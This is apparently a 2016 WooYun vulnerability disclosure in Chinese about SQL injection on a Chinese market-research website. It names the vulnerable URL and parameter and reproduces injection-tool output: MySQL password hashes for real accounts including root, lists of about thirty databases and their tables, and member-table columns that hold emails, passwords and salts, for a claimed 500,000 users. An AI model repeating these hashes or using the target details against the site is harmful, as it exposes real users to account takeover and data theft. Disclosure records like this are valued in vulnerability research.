当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0194624

漏洞标题:市场信息研究网主站SQL注入至整站50W+用户信息泄露(ROOT+可union跨库查询)

相关厂商:市场研究信息网

漏洞作者: Exploit DB

提交时间:2016-04-11 09:39

修复时间:2016-05-26 09:40

公开时间:2016-05-26 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国市场调研第一门户网站 影响30库

详细说明:

http://app.3see.com/job/public/post.php?pid=2960


database management system users password hashes:
[*] 3seeroot [3]:
    password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
    password hash: *DF23C7658CA68A644959B4DE7C7A0E12328F94BD
    password hash: *E30B1F9102F0C1B751E96316EF6C2A859436EC5C
[*] ailon [1]:
    password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
[*] cti_fbxt [1]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] doosan [1]:
    password hash: *02839BAECB5BEB57BE071190FF2E70701BF66FB1
[*] fbxt [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] pureftpd [1]:
    password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
[*] root [1]:
    password hash: *2D788DA8CDAE073D0DDB453E628EA003D8CDE85C
[*] skw [1]:
    password hash: *FC60E807774B9731F82DBC0CDA1159DC6494C95D
[*] wyt [1]:
    password hash: *64DF5C732B2AD96E34B95E4571C54011D342D7E5


QQ截图20160403232405.png


影响30库

available databases [30]:
[*] 3see
[*] 3seedb
[*] 3seeforum
[*] ailon
[*] air
[*] bbs
[*] bbs7vuchome
[*] blog
[*] boblog
[*] cti_fbxt
[*] discuz
[*] doosan
[*] fbxt
[*] fenghui
[*] fenghui08
[*] info
[*] information_schema
[*] kstory
[*] mysql
[*] mysql__
[*] new3see
[*] newyearwork
[*] pku_bbs
[*] pureftpd
[*] reportdata
[*] sgbbs
[*] sgblog
[*] skw_bbs
[*] skw_member
[*] space


当前数据库没有多少数据 1000+而已

Database: 3see
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| t_makepagelog         | 247155  |
| cms_data_comment      | 145038  |
| payreport             | 24432   |
| cms_data              | 22338   |
| cms_create_log        | 16043   |
| cojob_inbox           | 12335   |
| t_filelog             | 8966    |
| call_datasheet        | 8525    |
| myjob_edu             | 6382    |
| stat_sheet3see        | 6305    |
| myjob_oldjob          | 6298    |
| cms_data_picture      | 6271    |
| myjob_resume          | 5342    |
| freereports           | 4061    |
| g_book                | 3821    |
| myjob_item            | 3250    |
| media_datasheet       | 2890    |
| passwordtable         | 2573    |
| manufacturer_new      | 2498    |
| manufacturer          | 2192    |
| cojob_place_new       | 1798    |
| com_user              | 1348    |
| members_homepage      | 1331    |
| en_payreport          | 1210    |
| com_manufacturer      | 1117    |
| `3seecojob_coinfo`    | 1112    |
| m_company             | 1082    |
| m_user                | 1069    |
| myjob_favorite        | 968     |
| bidding               | 773     |
| manu_art              | 728     |
| com_homepages         | 715     |
| com_bidding           | 674     |
| com_book              | 662     |
| orders                | 633     |
| cms_page_module       | 603     |
| cojob_store           | 558     |
| myjob_city            | 505     |
| myjob_letter          | 489     |
| user_report           | 435     |
| userdree              | 433     |
| trainingtable         | 393     |
| t_log                 | 391     |
| manu_art_pic          | 366     |
| pv_stat               | 354     |
| myjob_search          | 346     |
| `3seemrarticle`       | 342     |
| lib_mrarticle         | 321     |
| mrconews              | 319     |
| cms_topic_data        | 318     |
| com_news              | 297     |
| cojob_place           | 256     |
| training              | 246     |
| payreport_co          | 192     |
| settlement            | 152     |
| `3seesoftsurveyother` | 141     |
| newpic                | 124     |
| company_job           | 123     |
| diaocha2009           | 115     |
| myjob_mymsg           | 113     |
| manu_friends          | 104     |
| cms_page              | 96      |
| new_hyclass           | 96      |
| cms_data_type         | 93      |
| library_datasheet     | 90      |
| manufacturer_inform   | 87      |
| cojob_deptandplace    | 84      |
| cms_structure         | 80      |
| t_menu                | 71      |
| cojob_sessions        | 65      |
| myjob_posttype        | 63      |
| inquiry               | 45      |
| p_commentary          | 45      |
| ads_aditempic         | 44      |
| cms_data_file         | 38      |
| shclass               | 36      |
| manufacturer_moban    | 34      |
| training_qy_name      | 33      |
| ads_aditem            | 32      |
| advertisement         | 30      |
| `3seehyclass`         | 29      |
| adcategory            | 29      |
| com_hyclass           | 29      |
| m_admin               | 24      |
| mrarticleclass        | 24      |
| uparticle             | 23      |
| com_uparticle         | 22      |
| myjob_black           | 20      |
| cati_literature       | 16      |
| cms_topic             | 16      |
| manufacturer_dongtai  | 16      |
| mrarticle_neikan      | 16      |
| cms_topic_comment     | 15      |
| lib_topic             | 14      |
| training_j            | 14      |
| anli_down             | 12      |
| cms_survey_item       | 12      |
| mrarticle_zazhi       | 12      |
| t_menuclass           | 12      |
| t_power               | 12      |
| trainingclass         | 12      |
| cms_nextid            | 11      |
| m_userinfo            | 11      |
| manufacturer_anli     | 11      |
| t_user                | 11      |
| bytuijian             | 10      |
| orderspayreport       | 10      |
| ads_class             | 9       |
| cms_default_module    | 8       |
| com_seccanli          | 8       |
| seccanli              | 8       |
| training_xilie        | 7       |
| com_anli              | 6       |
| com_dongtai           | 6       |
| cms_topic_group_type  | 5       |
| cati_downloads        | 4       |
| cati_softintro        | 4       |
| cati_trends           | 3       |
| cms_survey_main       | 3       |
| cms_survey_position   | 3       |
| manu_floatad          | 3       |
| manufacturer_mbclass  | 2       |
| cms_topic_group       | 1       |
| tex                   | 1       |
| wytad_count           | 1       |
+-----------------------+---------+


直接把管理员的表dump all 了吧

QQ截图20160403232405.png


看看其他的库

Database: 3seedb
[122 tables]
+-------------------------+
| cdb_access              |
| cdb_activities          |
| cdb_activityapplies     |
| cdb_adminactions        |
| cdb_admincustom         |
| cdb_admingroups         |
| cdb_adminnotes          |
| cdb_adminsessions       |
| cdb_advcaches           |
| cdb_advertisements      |
| cdb_announcements       |
| cdb_attachments         |
| cdb_attachpaymentlog    |
| cdb_attachtypes         |
| cdb_banned              |
| cdb_bbcodes             |
| cdb_caches              |
| cdb_campaigns           |
| cdb_creditslog          |
| cdb_crons               |
| cdb_debateposts         |
| cdb_debates             |
| cdb_failedlogins        |
| cdb_faqs                |
| cdb_favorites           |
| cdb_forumfields         |
| cdb_forumlinks          |
| cdb_forumrecommend      |
| cdb_forums              |
| cdb_imagetypes          |
| cdb_invites             |
| cdb_itempool            |
| cdb_linkheader          |
| cdb_magiclog            |
| cdb_magicmarket         |
| cdb_magics              |
| cdb_medallog            |
| cdb_medals              |
| cdb_memberfields        |
| cdb_membermagics        |
| cdb_members             |
| cdb_memberspaces        |
| cdb_moderators          |
| cdb_modworks            |
| cdb_myposts             |
| cdb_mytasks             |
| cdb_mythreads           |
| cdb_navs                |
| cdb_onlinelist          |
| cdb_onlinetime          |
| cdb_orders              |
| cdb_paymentlog          |
| cdb_pluginhooks         |
| cdb_plugins             |
| cdb_pluginvars          |
| cdb_polloptions         |
| cdb_polls               |
| cdb_posts               |
| cdb_profilefields       |
| cdb_projects            |
| cdb_promotions          |
| cdb_ranks               |
| cdb_ratelog             |
| cdb_regips              |
| cdb_relatedthreads      |
| cdb_reportlog           |
| cdb_request             |
| cdb_rewardlog           |
| cdb_rsscaches           |
| cdb_searchindex         |
| cdb_sessions            |
| cdb_settings            |
| cdb_smilies             |
| cdb_spacecaches         |
| cdb_stats               |
| cdb_statvars            |
| cdb_styles              |
| cdb_stylevars           |
| cdb_subscriptions       |
| cdb_tags                |
| cdb_tasks               |
| cdb_taskvars            |
| cdb_templates           |
| cdb_threads             |
| cdb_threadsmod          |
| cdb_threadtags          |
| cdb_threadtypes         |
| cdb_tradecomments       |
| cdb_tradelog            |
| cdb_tradeoptionvars     |
| cdb_trades              |
| cdb_typemodels          |
| cdb_typeoptions         |
| cdb_typeoptionvars      |
| cdb_typevars            |
| cdb_uc_admins           |
| cdb_uc_applications     |
| cdb_uc_badwords         |
| cdb_uc_domains          |
| cdb_uc_failedlogins     |
| cdb_uc_feeds            |
| cdb_uc_friends          |
| cdb_uc_mailqueue        |
| cdb_uc_memberfields     |
| cdb_uc_members          |
| cdb_uc_mergemembers     |
| cdb_uc_newpm            |
| cdb_uc_notelist         |
| cdb_uc_pms              |
| cdb_uc_protectedmembers |
| cdb_uc_settings         |
| cdb_uc_sqlcache         |
| cdb_uc_tags             |
| cdb_uc_vars             |
| cdb_usergroups          |
| cdb_validating          |
| cdb_videos              |
| cdb_videotags           |
| cdb_virtualforums       |
| cdb_warnings            |
| cdb_words               |
| textt                   |
+-------------------------+


39W+用户信息

QQ截图20160403232405.png


Database: 3seedb
Table: cdb_uc_members
[12 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| lastloginip   | int(10)               |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| password      | char(32)              |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(15)              |
+---------------+-----------------------+
Database: 3seedb
Table: cdb_members
[48 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| accessmasks   | tinyint(1)            |
| adminid       | tinyint(1)            |
| avatarshowid  | int(10) unsigned      |
| bday          | date                  |
| credits       | int(10)               |
| customaddfeed | tinyint(1)            |
| customshow    | tinyint(1) unsigned   |
| dateformat    | tinyint(1)            |
| digestposts   | smallint(6) unsigned  |
| editormode    | tinyint(1) unsigned   |
| email         | char(40)              |
| extcredits1   | int(10)               |
| extcredits2   | int(10)               |
| extcredits3   | int(10)               |
| extcredits4   | int(10)               |
| extcredits5   | int(10)               |
| extcredits6   | int(10)               |
| extcredits7   | int(10)               |
| extcredits8   | int(10)               |
| extgroupids   | char(20)              |
| gender        | tinyint(1)            |
| groupexpiry   | int(10) unsigned      |
| groupid       | smallint(6) unsigned  |
| invisible     | tinyint(1)            |
| lastactivity  | int(10) unsigned      |
| lastip        | char(15)              |
| lastpost      | int(10) unsigned      |
| lastvisit     | int(10) unsigned      |
| newsletter    | tinyint(1)            |
| oltime        | smallint(6) unsigned  |
| pageviews     | mediumint(8) unsigned |
| password      | char(32)              |
| pmsound       | tinyint(1)            |
| posts         | mediumint(8) unsigned |
| ppp           | tinyint(3) unsigned   |
| prompt        | tinyint(1)            |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| secques       | char(8)               |
| showemail     | tinyint(1)            |
| sigstatus     | tinyint(1)            |
| styleid       | smallint(6) unsigned  |
| timeformat    | tinyint(1)            |
| timeoffset    | char(4)               |
| tpp           | tinyint(3) unsigned   |
| uid           | mediumint(8) unsigned |
| username      | char(15)              |
| xspacestatus  | tinyint(1)            |
+---------------+-----------------------+


Database: discuz
[53 tables]
+--------------------+
| cdb_access         |
| cdb_adminactions   |
| cdb_admingroups    |
| cdb_adminnotes     |
| cdb_adminsessions  |
| cdb_advertisements |
| cdb_announcements  |
| cdb_attachments    |
| cdb_attachtypes    |
| cdb_banned         |
| cdb_bbcodes        |
| cdb_blogcaches     |
| cdb_buddys         |
| cdb_creditslog     |
| cdb_failedlogins   |
| cdb_favorites      |
| cdb_forumfields    |
| cdb_forumlinks     |
| cdb_forums         |
| cdb_medals         |
| cdb_memberfields   |
| cdb_members        |
| cdb_moderators     |
| cdb_onlinelist     |
| cdb_onlinetime     |
| cdb_orders         |
| cdb_paymentlog     |
| cdb_plugins        |
| cdb_pluginvars     |
| cdb_pms            |
| cdb_polls          |
| cdb_posts          |
| cdb_profilefields  |
| cdb_ranks          |
| cdb_ratelog        |
| cdb_regips         |
| cdb_rsscaches      |
| cdb_searchindex    |
| cdb_sessions       |
| cdb_settings       |
| cdb_smilies        |
| cdb_stats          |
| cdb_statvars       |
| cdb_styles         |
| cdb_stylevars      |
| cdb_subscriptions  |
| cdb_templates      |
| cdb_threads        |
| cdb_threadsmod     |
| cdb_threadtypes    |
| cdb_usergroups     |
| cdb_validating     |
| cdb_words          |
+--------------------+


9W+用户信息

QQ截图20160403232405.png


Database: bbs
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| cdb_posts        | 8084    |
| cdb_threads      | 7461    |
| cdb_spacecaches  | 2708    |
| cdb_memberfields | 543     |
| cdb_members      | 543     |
| cdb_memberspaces | 542     |
| cdb_rsscaches    | 461     |
| cdb_myposts      | 258     |
| cdb_settings     | 221     |
| cdb_mythreads    | 126     |
| cdb_statvars     | 75      |
| cdb_stylevars    | 52      |
| cdb_stats        | 50      |
| cdb_faqs         | 34      |
| cdb_forumfields  | 30      |
| cdb_forums       | 29      |
| cdb_smilies      | 29      |
| cdb_usergroups   | 16      |
| cdb_crons        | 13      |
| cdb_magics       | 12      |
| cdb_projects     | 11      |
| cdb_medals       | 10      |
| cdb_bbcodes      | 7       |
| cdb_onlinetime   | 7       |
| cdb_ranks        | 5       |
| cdb_onlinelist   | 4       |
| cdb_admingroups  | 3       |
| cdb_failedlogins | 1       |
| cdb_forumlinks   | 1       |
| cdb_styles       | 1       |
| cdb_templates    | 1       |
+------------------+---------+


这里也有部分用户信息

QQ截图20160403232405.png


全部加起来应该有50W了

漏洞证明:

修复方案:

版权声明:转载请注明来源 Exploit DB@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评价